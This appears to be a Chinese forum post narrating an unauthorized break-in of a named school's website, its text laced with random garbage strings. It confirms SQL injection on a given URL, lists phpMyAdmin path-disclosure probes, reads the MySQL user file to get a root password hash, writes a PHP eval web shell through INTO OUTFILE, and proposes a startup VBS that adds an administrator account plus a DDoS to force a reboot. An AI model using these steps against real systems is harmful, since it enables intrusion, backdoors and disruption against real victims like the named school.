友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
6 Y, t0 d" s( Y  g
: T9 W* U  ^; R: D2 H

常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

, p5 L0 n5 E$ M- _6 [那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
$ y4 |3 v* H3 @" `+ i$ m- b, B
1 ?. y# E' I7 e试着爆绝对路径：
3 N+ l; f; V3 o' `$ G1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
7 x, W& q; ?; r( n' H& k, ^4 O4 L3./load_file()  
+ u3 d& n8 ]& E% @- Y' t/ Y4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
4 |: W+ C2 D) @/ l5 P5./phpmyadmin/libraries/select_lang.lib.php  
8 ?' x; H: j# {* Q/ i  K2 m6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
% R- u- S7 f# N: s" V" x8./phpmyadmin/libraries/export/xls.php  

/ g% {4 Z3 q, F( [/ X6 G8 G7 w均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

9 f3 ?% X3 Y: g: p' e( ~权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

. q9 v: h5 z+ S1 }" w/ [默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

! B0 g: J7 {. n" e5 ~& z+ C想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
/ ?" A$ @% n6 f* `
& w" u9 ?$ k1 L5 ]7 f自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

. a5 Y0 h2 H0 Q) E( E1 O8 L8 {! D% V成功读到root密码：
8 }6 ]4 h& g; R( _4 m& o5 U  `
7 q2 X+ o' a( l  U9 h17---- r(0072)
18---- o(006f)
3 }( z% u+ d; i  Y  m19---- o(006f)
8 e( t9 H( }0 A) X; F4 C1 n0 m20---- t(0074)
& n8 l( h) j  {21---- *(002a)
22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
: d* c) W, m/ k, w/ s( D& B26---- C(0043)
& i3 I7 b% [+ ~. x& \27---- 5(0035)
6 [7 |; n7 N. P9 F28---- 8(0038)
3 @* i# C) i8 g* s4 V29---- 2(0032)
( G1 O0 Z9 [; o* A1 P8 ~* q. e30---- 8(0038)
31---- A(0041)
32---- 9(0039)
33---- B(0042)
34---- 5(0035)
35---- 4(0034)
2 h% p8 |7 z/ {8 I7 A; J36---- 8(0038)
) p3 U7 A6 P" t( M6 v- @37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
: K- V7 S' g% f; ~3 g- E42---- 5(0035)
  k! D; k5 V# m5 o43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
+ y* r% h  T- r7 l' [  q46---- 8(0038)
47---- F(0046)
/ a$ W6 W: B1 t( x' M3 T! P  p48---- F(0046)
49---- 4(0034)
" R+ j% ^; D: s50---- F(0046)
! |& G# T7 h3 e51---- 0(0030)
4 A; O. f& O1 V3 s$ t2 \52---- 3(0033)
53---- 2(0032)
' J6 O) j5 R% I5 d. t8 X54---- A(0041)
55---- 4(0034)
56---- A(0041)
3 |& K* c3 F5 k8 k% h1 y57---- B(0042)
/ W. l: n0 ^) |' J3 h3 c58---- *(0044)
: \0 O) s, ^8 `" n' I4 a7 s% [* M59---- *(0035)
- d, n# l$ [  o8 r60---- *(0041)
* F8 ^$ I+ Z/ ?( d/ S3 S6 B7 I61---- *0032)

. l! Q4 s2 [7 H" o" s( Y1 ?解密后成功登陆phpmyamin
                          
6 D5 ~0 Y3 a* ?$ t, C
                             
! A0 E% s$ ^* U( m: q
/ c) y3 W2 A" t* e% h找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
$ V8 p" v2 A: `
成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
9 [6 m& W2 u6 J4 H( L5 E: _
9 n2 n8 r7 M' @+ {) p7 P) @但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
" F$ k& a- F% B0 a+ @5 e

服务器上已经有个隐藏帐号了

$ q" l( c% \. p  a

别名     administrators
+ E1 e; z1 r; i# [( c! s注释     管理员对计算机/域有不受限制的完全访问权

% [2 U6 h) g& w! ?8 q

成员

-------------------------------------------------------------------------------
4 b( m3 G7 p* A. R9 V# vadmin
4 D% j- K; _% o7 w6 z8 t* i2 ~Administrator
0 d' z6 S4 b  Z8 S' U+ tslipper$
* F) D# F( d; R( Usqluser
3 L7 V4 T4 I% r) B( M  X命令成功完成。
# K1 |; y' X2 J7 c7 z9 {9 l
$ |$ v: |6 b( l6 t- }/ v服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
9 W+ ]0 ]8 c/ D' h) ~
; X- i3 e1 u4 @7 o0 s- s$ V7 Wddos服务器重启，不然就只能坐等服务器重启了...............................

      

. r9 P9 N6 }# @5 n- D) p9 w3 \

angel